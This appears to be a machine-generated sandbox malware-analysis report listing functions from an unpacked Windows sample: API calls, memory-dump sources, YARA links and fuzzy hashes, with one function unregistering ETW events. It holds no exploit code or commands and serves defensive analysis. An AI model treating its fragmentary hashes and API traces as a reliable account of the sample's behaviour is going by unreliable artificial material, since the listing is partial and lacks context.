String ID: WATSON support: failed to register DAC dll with WerRegisterRuntimeExceptionModule$WATSON support: registered DAC dll with WerRegisterRuntimeExceptionModule
API String ID: 634786029-3965477652
Opcode ID: 0f838fb19e69b8dcb53d035728e0f53792254e60fa00fcf89e35466aeaa262ba
Instruction ID: 5cc0c3228ea0ab1f1c62e15d871e66f319e806c18434da87a09ce552eddc5297
Opcode Fuzzy Hash: 0f838fb19e69b8dcb53d035728e0f53792254e60fa00fcf89e35466aeaa262ba
Instruction Fuzzy Hash: 7F516970C04268DBDB20CF28CD497DDBBB0EB54714F1082A9E808AB381EB745E84CF51

Function 00712CD0 Relevance: 5.3, APIs: 4, Instructions: 296COMMON

Download Yara Rule

APIs

Part of subcall function 0096F380: GetProcessHeap.KERNEL32(?,0097299A,0000000C,BBFE6088,?,00000002,?,?,00C11AA4,000000FF,?,0097DCAE,00000002,00000002), ref: 0096F38C
Part of subcall function 0096F380: RtlAllocateHeap.NTDLL(03400000,00000000,00000002,?,0097299A,0000000C,BBFE6088,?,00000002,?,?,00C11AA4,000000FF,?,0097DCAE,00000002), ref: 0096F3AA

Part of subcall function 007D33E0: LeaveCriticalSection.KERNEL32(00DAAFE4,BBFE6088,03426818), ref: 007D347F

InitializeCriticalSection.KERNEL32(00DAAB20,?,?,?,?,?,?,?,?,00000000,?,?,C0000000,00C11DDE), ref: 00712FAC
InitializeCriticalSection.KERNEL32(00DAAB04,?,?,?,?,?,?,?,?,00000000,?,?,C0000000,00C11DDE), ref: 00712FD5
InitializeCriticalSection.KERNEL32(00DAAFB0,00DB3670,00DB3DF0,00000000), ref: 00713155
InitializeCriticalSection.KERNEL32(00DB4034), ref: 0071317E

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CriticalSection$Initialize$Heap$AllocateLeaveProcess
String ID:
API String ID: 3913766473-0
Opcode ID: cbc4ba86baea425b15178d02104bd2206356d8778f207c5ac1c719e6a210e7ff
Instruction ID: 1b9cb7f2f0717b628849bc7d085689ceb4da1c7733480880a8a01f7b393ae1df
Opcode Fuzzy Hash: cbc4ba86baea425b15178d02104bd2206356d8778f207c5ac1c719e6a210e7ff
Instruction Fuzzy Hash: 75D18DF0D01384DEEB10DFA8D91939D7BF0AB05718F108299D4559B3E2D7B98B44EBA2

Function 00986CB0 Relevance: 4.6, APIs: 3, Instructions: 110fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0071F800: wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000004,00000000,BBFE6088,?,?), ref: 0071F88C

Part of subcall function 0071B160: HeapFree.KERNEL32(00000000,?,BBFE6088,?,00000000,00C13A4D,000000FF,?,0097038C,?,00D03E74), ref: 0071B1A3

CreateFileW.KERNELBASE(00000000,40000000,00000080,00000000,?,?,00000000,?,00000000,00000000,00000000,BBFE6088,00000000,00000000,00000000), ref: 00986E2C
GetLastError.KERNEL32(?,00000000,00000000,00000000,BBFE6088,00000000,00000000,00000000), ref: 00986E3A
SetLastError.KERNEL32(00000000), ref: 00986F70

Part of subcall function 0097D690: HeapFree.KERNEL32(00000000,?,?,?), ref: 0097D7A8

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ErrorFreeHeapLast$CreateFilewcscpy_s
String ID:
API String ID: 2733571464-0
Opcode ID: 0b1671d7b5ead8d042353a2b8c6d3b640ad76ed3fab4876f2226991038ca46fc
Instruction ID: 74f9c4891251b6cf12f67a0134f1d3734667723579ca0440a8a36fe53d14b9e1
Opcode Fuzzy Hash: 0b1671d7b5ead8d042353a2b8c6d3b640ad76ed3fab4876f2226991038ca46fc
Instruction Fuzzy Hash: 32510A71801258EEDB20DF68DD98BDDBBB4EB08314F2042D9E519A7291DB745F88CF51

Function 009869D0 Relevance: 4.6, APIs: 3, Instructions: 107libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0071F800: wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000004,00000000,BBFE6088,?,?), ref: 0071F88C

Part of subcall function 0071B160: HeapFree.KERNEL32(00000000,?,BBFE6088,?,00000000,00C13A4D,000000FF,?,0097038C,?,00D03E74), ref: 0071B1A3

LoadLibraryExW.KERNEL32(?,00000000,?,?,?,00000000,?), ref: 00986B21
GetLastError.KERNEL32 ref: 00986B2F
SetLastError.KERNEL32(00000000), ref: 00986C64

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ErrorLast$FreeHeapLibraryLoadwcscpy_s
String ID:
API String ID: 479767642-0
Opcode ID: 5023735c5e622d996f4bd563ea2c21d8519e0bc3b0781f2ccd3c543b69ce673e
Instruction ID: 1b394f5c3850c3355c6a0684862e45822aef603f45d5284daa49297a6f58cb2a
Opcode Fuzzy Hash: 5023735c5e622d996f4bd563ea2c21d8519e0bc3b0781f2ccd3c543b69ce673e
Instruction Fuzzy Hash: C2411971805268EACB20DFA4DD997DEBBB8EB18700F2041DAE409A7291DB745F84CF91

Function 00987E90 Relevance: 4.6, APIs: 3, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009747A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(BBFE6088,?,00000000,00004000), ref: 0097480E
Part of subcall function 009747A0: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 00974822
Part of subcall function 009747A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0097482E
Part of subcall function 009747A0: HeapFree.KERNEL32(00000000,00000000), ref: 00974852

GetProcessHeap.KERNEL32(?,?,00B75D8A,?,00000000), ref: 00987EBD
HeapAlloc.KERNEL32(03400000,00000000,00000028,?,?,?,00B75D8A,?,00000000), ref: 00987EDB
CreateFileMappingA.KERNEL32(000000FF,00000000,04000040,00000000,000000FF,00000000), ref: 00987F75

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$_errno$AllocCreateFileFreeMappingProcesswcstoul
String ID:
API String ID: 4279892807-0
Opcode ID: 69e7caaee57e5ee589279101fedb989cf6eb2abb84517486bf077d77624e74b0
Instruction ID: b6397174e7e94ea66879a0cfde1723317b1250f92fcd9b8879d129bcc24aefc3
Opcode Fuzzy Hash: 69e7caaee57e5ee589279101fedb989cf6eb2abb84517486bf077d77624e74b0
Instruction Fuzzy Hash: A321DE702147408BE330DFA9DC09746BBE4EB49324F1087ADE4599B7D0EBB5E4448BE4

Function 008304A0 Relevance: 4.5, APIs: 3, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 007D9AA0: SetEvent.KERNEL32(034217A8,00000000,BBFE6088,?,00000000,00000004), ref: 007D9D5C

SetEvent.KERNEL32(03450CB8,00000001), ref: 0083051C
SetEvent.KERNEL32(03450CE8,00000001), ref: 00830537
SleepEx.KERNELBASE(000000FF,00000000), ref: 0083055A

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Event$Sleep
String ID:
API String ID: 1754279505-0
Opcode ID: 6960c358c5c154f8bc8c4dada70f7aece078e631f898404b8acd4e50bb0200cf
Instruction ID: 1c11b0ba102d077d93932829d875c2b6f9a84d6937f4f79ecc2a9f777ff7de37
Opcode Fuzzy Hash: 6960c358c5c154f8bc8c4dada70f7aece078e631f898404b8acd4e50bb0200cf
Instruction Fuzzy Hash: 90119E30600344DFDB10EF68E8687597BF0FB46314F50806AE145DB3A6CB769846CFA1

Function 00715BC0 Relevance: 3.9, APIs: 3, Instructions: 158COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(?,?,BBFE6088,00000000,BBFE6088,?,?,00000001,BBFE6088,?), ref: 00715C5B

Part of subcall function 0074F7B0: EnterCriticalSection.KERNEL32(74FDD070,?,74FDD070,?,74FDD070,?,008384AE,?,00983B95), ref: 0074F839

LeaveCriticalSection.KERNEL32(?,?,BBFE6088,00000000,BBFE6088,?,?,00000001,BBFE6088,?), ref: 00715C8E
LeaveCriticalSection.KERNEL32(?,00000000,BBFE6088,?,BBFE6088,00000000,BBFE6088,?,?,00000001,BBFE6088,?), ref: 00715CDC

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter
String ID:
API String ID: 2978645861-0
Opcode ID: 73fcc8722d4ba1b211510d1e22a3a7499b48fa513680b8f631bb7e8da781f895
Instruction ID: 025789f03db977d506cdfa1a56f7fa8710e3982d1c1441715451b6e609ded6ed
Opcode Fuzzy Hash: 73fcc8722d4ba1b211510d1e22a3a7499b48fa513680b8f631bb7e8da781f895
Instruction Fuzzy Hash: D151BE71A01B05DBCB25CF6DD888BDABBB4EF85710F10425AE855633D2DB389A41CBE0

Function 0544E341 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

EtwEventUnregister.NTDLL(?,?), ref: 0544E3BE

Strings

X_, xrefs: 0544E3A2

Memory Dump Source

Source File: 00000000.00000002.1709251567.0000000005440000.00000020.00001000.00040000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_file.jbxd

Similarity

API ID: EventUnregister
String ID: X_
API String ID: 1359036815-3758330417
Opcode ID: f86731b156ec975093bd49c195ce249e55d6ffe912b64720b5e7fcd25595d438
Instruction ID: 1790b9552b015320977e8a8a314e8ddcb9e50a5d49b0eea10b3ea050284c62e4
Opcode Fuzzy Hash: f86731b156ec975093bd49c195ce249e55d6ffe912b64720b5e7fcd25595d438
Instruction Fuzzy Hash: 263113B0E002599FCB04CFA8D8859EEBBF1BF48304F14846AE41AE7352D730A840CFA5

Function 0544E350 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

EtwEventUnregister.NTDLL(?,?), ref: 0544E3BE

Strings

X_, xrefs: 0544E3A2

Memory Dump Source

Source File: 00000000.00000002.1709251567.0000000005440000.00000020.00001000.00040000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_file.jbxd

Similarity

API ID: EventUnregister
String ID: X_
API String ID: 1359036815-3758330417
Opcode ID: e173d619698727f0823eef405eff64b262a5d1779c0ded7f236782b07e982099
Instruction ID: 09b654432d594d088b2c48144973ee32b6bd6e186a00a26ea08d324b847ffea1
Opcode Fuzzy Hash: e173d619698727f0823eef405eff64b262a5d1779c0ded7f236782b07e982099
Instruction Fuzzy Hash: C431D3B5E012598FCB04CFA9D8859EEBBF5BF48304F14846AE419E7351D730A841CFA5

Function 007D81B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?,?,00000000,?,00A27093,00000001,00000000,00A26F50,00000000,00000000), ref: 007D81BA

Part of subcall function 008384C0: GetLastError.KERNEL32(BBFE6088,?,00000000), ref: 008384F2
Part of subcall function 008384C0: _swprintf.LIBCMT ref: 00838529
Part of subcall function 008384C0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00838569
Part of subcall function 008384C0: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,000000FF,00000000,00000000), ref: 008385A4
Part of subcall function 008384C0: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 008385EA

Strings

ResumeThread, xrefs: 007D81C9

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorFreeHeapLastResumeThread_swprintf
String ID: ResumeThread
API String ID: 1738802777-947044025
Opcode ID: 9bff09a8e5d05d3785c065cf2a60775c820de08c17735b3c0fcc68686c435cfa
Instruction ID: b2e0d52d70134b5b8a0270bf0ea932036b76905fdd300f124c7dbc0c7821287c
Opcode Fuzzy Hash: 9bff09a8e5d05d3785c065cf2a60775c820de08c17735b3c0fcc68686c435cfa
Instruction Fuzzy Hash: C5D0A922B0002027C118226E6C086EFA229CBE2272729023AFA66C73D0CEA00C4242F2

Function 007D9AA0 Relevance: 3.2, APIs: 2, Instructions: 178threadCOMMON

Download Yara Rule

APIs

Part of subcall function 007DE6E0: VirtualQuery.KERNEL32(?,?,0000001C,00000000,?,?,?,?,?,007D97F4), ref: 007DE6FF

GetCurrentThreadId.KERNEL32 ref: 007D9C2F
SetEvent.KERNEL32(034217A8,00000000,BBFE6088,?,00000000,00000004), ref: 007D9D5C

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CurrentEventQueryThreadVirtual
String ID:
API String ID: 2478193043-0
Opcode ID: 16be95a51f14cfa9f43f8012bdda2d384a397f148f01f4b6395c982e91aca729
Instruction ID: ae4d1fcbbbc2e708da331cf8808b03687282d1059b5be83d725aeca911b33da8
Opcode Fuzzy Hash: 16be95a51f14cfa9f43f8012bdda2d384a397f148f01f4b6395c982e91aca729
Instruction Fuzzy Hash: B7718A70A00348CFDB14DFA8D88979DBBF5FB05314F14456EE905AB392DB79A905CBA0

Function 00728B70 Relevance: 3.2, APIs: 2, Instructions: 170memoryCOMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00728BAD
HeapFree.KERNEL32(00000000,?,?,?,00000006,00000000,?,?,00000006,00000000,?,00000000,00000000), ref: 00728D0B

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap___from_strstr_to_strchr
String ID:
API String ID: 1887983760-0
Opcode ID: 43f46ee3d317f0a317f2cd168b19b1ab48a957c9d40e95dadff2ed9769366ec4
Instruction ID: 602c299d79fabc5f7ca9746bb945e6113eaed44e4b79155412440bb6546b394f
Opcode Fuzzy Hash: 43f46ee3d317f0a317f2cd168b19b1ab48a957c9d40e95dadff2ed9769366ec4
Instruction Fuzzy Hash: F5614D71E012199FCF64CFA8D894B9EB7B8FF08310F20411AE815EB390DB39A904CB61

Function 007DCF10 Relevance: 3.1, APIs: 2, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 007DCF38
CoRegisterInitializeSpy.OLE32(00000000,000003C8), ref: 007DCFE5

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CurrentInitializeRegisterThread
String ID:
API String ID: 3977203164-0
Opcode ID: 1666810ab9a9502a5bafda88dde1213d7c200bd1e0077a5bb5ef851907b4ec45
Instruction ID: c16071b7daf45f5c46743b1f5b61111aae656cbc97692eb814bdd3f66117165c
Opcode Fuzzy Hash: 1666810ab9a9502a5bafda88dde1213d7c200bd1e0077a5bb5ef851907b4ec45
Instruction Fuzzy Hash: 0941D271A05749EBDB15CF68D901B9ABBF8EB05714F20426EE815D73C0D7BA9A04CB90

Function 00B759C0 Relevance: 3.1, APIs: 2, Instructions: 82threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B75A55

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: eb1851db54c9eb21f0345e2cb9f3f4f071d0ea017c1efbbb9c9a0a351f3edc49
Instruction ID: b847d9481aa0e23b4d8b2a35660268c0d6d6633e0273f6411b14ccf8b42d3041
Opcode Fuzzy Hash: eb1851db54c9eb21f0345e2cb9f3f4f071d0ea017c1efbbb9c9a0a351f3edc49
Instruction Fuzzy Hash: 67317CB0A44B45DFDB20DF68E88535ABBF4F704314F108769E829D7390D7B5AA048BB1

Function 00A30F90 Relevance: 3.1, APIs: 2, Instructions: 71threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,00A31B00,00000000,00000000,00000000), ref: 00A31023
CloseHandle.KERNELBASE(00000000), ref: 00A3103A

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CloseCreateHandleThread
String ID:
API String ID: 3032276028-0
Opcode ID: 303b236a2f30d7ed149bdd541f419ba7e7674d3283bcc1a060364bf1cd371c54
Instruction ID: 9b669dd43f0529e7dbfb57e3830a07dbf560019b6767e7d12941205a9b9b4587
Opcode Fuzzy Hash: 303b236a2f30d7ed149bdd541f419ba7e7674d3283bcc1a060364bf1cd371c54
Instruction Fuzzy Hash: 8D316B70E04389EFDB14CF98C855BAEFBB4FB05714F14816AE800A7380DBB56A05CB90

Function 0096F430 Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(BBFE6088,00000000,00000000,00C13410,000000FF,?,00983D82), ref: 0096F45E
RtlAllocateHeap.NTDLL(03400000,00000000,00000030,BBFE6088,00000000,00000000,00C13410,000000FF,?,00983D82), ref: 0096F47A

Memory Dump Source

